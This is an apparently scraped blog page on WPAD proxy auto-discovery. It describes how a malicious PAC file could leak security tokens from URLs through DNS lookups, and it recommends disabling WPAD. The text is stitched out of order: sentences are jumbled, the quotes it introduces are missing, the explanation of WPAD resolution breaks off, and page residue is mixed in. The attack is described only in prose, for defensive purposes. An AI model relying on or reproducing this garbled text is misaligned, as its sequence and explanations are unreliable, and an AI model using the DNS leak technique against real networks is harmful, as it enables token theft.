Notify me of new posts via email. Skip to content Justin Cooney. Share this: Twitter Pinterest Facebook. Like this: Like Loading Published by Justin Cooney. Leave a Reply Cancel reply Enter your comment here Fill in your details below or click an icon to log in:. Email required Address never made public. Name required. Follow Following. These redirects may encode security tokens as part of the URL.
The OAuth2 spec even warns about this:. A malicious PAC file would have access to this information. It could then proceed to leak this information to an attacker. A simple way to do so would be to encode the information in the subdomain part of the proxy URL. This would in turn cause a DNS lookup with the leaked token. If the attacker controls the DNS server and this is pretty much possible with a fast DHCP server , he or she would then have retrieved the data.
Another option for the attacker would be to simply make a direct DNS request using the dnsResolve function available from inside the PAC file. Although the problem is not directly linked to WPAD, it does compound the problem.
All clients with WPAD enabled would silently fall into the trap. And they would do so transparently. Only a security conscious user may for any reason access the proxy settings of their computer and then take note a proxy is in use. Still, they would not realize of the malicious behaviour until checking the PAC file or the network requests performed against the proxy. As another abstract from the upcoming BlackHat conference describes, WPAD attacks, although known for a while, are still a source for concern:.
A sensible fix has been implemented by Microsoft. There is little reason for a PAC file to require access to the path to compute the right proxy for a host. If there is a legitimate PAC file out there that does this, a better alternative must surely be available. Therefore, the only way to make sure you are not exposed to the attack is to make sure WPAD is disabled. Most systems allow for per-network settings. There is no reason to keep WPAD enabled. This is of particular importance for WiFi networks.
Most laptops connect inadvertently to public WiFi access points. There are many ways to configure networks in Linux systems. In case you are using netctl, ConnMan or other network manager, check the docs for them. The DNS server must notice this and then proceed to point the browser to the host address where this file is located. This option specifies the exact location of the PAC file.
The file name does not need to follow any specific naming convention, however if WPAD DNS is to be used also, the file must have the file name wpad. On Windows, this is based on the domain the machine is joined to, while on Linux and Mac OS X this is based on the Search Domain s configured in the network settings. In the following example, a Windows machine is joined to the domain uk. After checking the network settings, the browser identifies the host machine as being part of the domain uk.
The browser attempts to resolve wpad. The browser attempts and succeeds in resolving wpad.
0コメント